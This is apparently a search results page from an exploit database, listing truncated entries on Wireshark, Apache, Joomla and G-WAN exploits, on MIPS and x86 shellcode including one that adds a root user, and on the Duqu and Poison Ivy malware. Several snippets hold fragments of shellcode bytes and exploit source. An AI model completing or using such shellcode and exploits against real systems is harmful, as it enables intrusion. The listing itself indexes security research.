7260 matches found
Wireshark 1.4.4 - DECT Dissector Remote Buffer Overflow
Wireshark 1.4.4 - DECT Dissector Remote Buffer Overflow !/usr/bin/env python -- coding: iso-8859-15 -- a = """ \n\t-- CVE: 2011-1591 : Wireshark = 2.5 For any comments, remarks, news, please mail me : ipv at team . net \n""" import sys, struct if sys.versioninfo = 2, 5: from scapy.all import else...
linux/x86 cdda2cdr local disk exploit
! /bin/sh Exploit database separated by exploit type local, remote, DoS, etc. + Site : 1337day.com + Support e-mail :...
Duqu Attackers Using Word Docs As Attack Vector
As the analysis of the Duqu malware continues to evolve, the picture that’s emerging is becoming more and more intriguing. The latest bits of evidence uncovered show that not only do the attackers create custom files for each individual attack, there is evidence indicating that they might have be...
Microsoft Windows Secure Sockets Layer Version 3.0 (CVE-2004-0120)
Secure Sockets Layer (SSL) is a cryptographic protocol that provides security and data integrity for communications over TCP/IP networks. The protocol is considered obsolete and insecure. This protection can detect and prevent connections attempting to use this protocol. In particular, this protecti...
SCADA DNP3 Server Response Flooding
A vulnerability exists in the DNP3 protocol. An attacker can use this exploit to perform unauthorized actions. There are cases in which certain traffic, although not intended for malicious use, is very unsafe, since it may transfer shellcode which is undetectable by IPS...
SCADA DNP3 Unsolicited Server Response Flooding
A vulnerability exists in the DNP3 protocol. An attacker can use this exploit to perform unauthorized actions. There are cases in which certain traffic, although not intended for malicious use, is very unsafe, since it may transfer shellcode which is undetectable by IPS...
Poison Ivy RAT Still Giving Users a Rash
The Poison Ivy malware kit is old. It was first seen in 2005, which makes it about 762 years old in Internet years. But that doesn’t mean it’s no longer useful, as evinced by the data collected by Microsoft in a new report on the tool, which shows that it is still in active use and is turning up ...
linux/x86 execve("/usr/bin/ftp", "sdf.lonestar.org", NULL) 73 bytes
/ 73 bytes sysexecve"/usr/bin/ftp", "sdf.lonestar.org", NULL polymorphic shellcode Tested On : Debian Squeeze 6.02 Linux x86-based OS Programmer : Paulus Gandung Prakosa 0x1337day Thanks to : mywisdom, chaer.newbie, wenkhairu, ketek, gunslinger, nofiafitri, xtr0nic, t3k0, tabun, petimati, and all...
MIPS Linux XOR Shellcode Encoder 60 Bytes
MIPS Linux XOR Shellcode Encoder 60 Bytes. Shellcode exploit for linuxmips platform include include include include include include include define DEBUG 0 / entropy at phiral.net mips linux shellcode xor encoder \xAB\xCD is overwritten with jmp back offset \x00\x00 is overwritten with the byte it...
Joomla NoNumber Framework Local File Inclusion / Shell Upload
Exploit Title: NoNumber Framework Joomla! Plugin Multiple Vulnerabilities Discovery Date: 10 October 2011 Reported Date: 11 October 2011 Patch Date: 17 October 2011 Release Date: 17 October 2011 Author: jdc Software Link: http://nonumber.nl The nnframework plugin by NoNumber! contains multiple...
Apache 2.2.0 - 2.2.11 Remote exploit
No description provided by source. include include include include include include include include void usagechar argv printf"Usage: %s \n\n",argv0; exit1; int mainint argc,char argv // weareevilweareevilbindshell31337shellcodein91bytes: char shellcode= "\xb8\xff\x2f\x73\x68\xc1\xe8\x08\x50"...
Multiple G-WAN vulnerabilities
Title: Multiple G-WAN vulnerabilities Product: G-WAN http://gwan.com/ Author: Fredrik Widlund E-mail: fredrik.widlund at gmail dot com Date: 2011-10-12...
PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD
Exploit for windows platform in category remote exploits $Id: pcvuefunc.rb 13889 2011-10-12 10:57:31Z sinn3r $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on...
52 byte Linux MIPS execve
52 byte Linux MIPS execve. Shellcode exploit for linuxmips platform include / entropy at phiral.net 52 byte linux mips shellcode oh werd [email protected] /encode/1/2 cat s.s .section .text .globl start .set noreorder start: li $a2, 0x666 p: bltzal $a2, p slti $a2, $zero, -1 addu $sp, $sp, -32...
BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass
BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass Exploit Title: BlazeVideo HDTV Player 6.6 Professional Universal DEP+ASLR Bypass Author: modpr0be Software Download: http://www.blazevideo.com/download.php?product=blazevideo-hdtv-pro Date: 07/10/2011 Tested on: Windows XP SP3,...
linux/mips Lexecve 52 byte
; universal OSX dyld ROP shellcode ; tested on OS X 10.6.8 ; ; if you don't want to compile, copy stage0 code from precompiled.txt ; and append your normal shellcode to it. ; ; usage: ; - put your 'normal' shellcode in x64shellcode.asm ; - make ; - ./sc ; ; if you want to test: ; - uncomment lea...
BlazeVideo HDTV Player 6.6 Professional Universal DEP+ASLR Bypass
Exploit for windows platform in category local exploits Exploit Title: BlazeVideo HDTV Player 6.6 Professional Universal DEP+ASLR Bypass Author: modpr0be Software Download: http://www.blazevideo.com/download.php?product=blazevideo-hdtv-pro Date: 07/10/2011 Tested on: Windows XP SP3, Windows Vista...
Web Servers HTTP Flooding Denial of Service
The vulnerability is due to the server's inability to handle multiple incoming HTTP requests within a short period of time. Remote attackers may exploit this issue by rapidly sending a large number of HTTP requests to the server. The attack may be initiated from one or more sources (DDoS). Successf...
linux/x86 Addnew Users 'root' /etc/passwd shell code 79 bytes
Linux X86 Addnew Users 'Ro0t' /etc/passwd shell code 79 bytes ...
Quick easy ftp server 4.0.0 format string vulnerability in multiple commands - vulnerability warning - the black bar safety net
Version: Quick easy ftp server 4.0.0 (other versions not tested). Tested on: W2K SP4. Quick easy ftp server 4.0.0 uses the wsprintfA function unsafely for string operations, resulting in format string vulnerabilities. The affected commands include LS, CD, USER, etc. The USER command does not need to...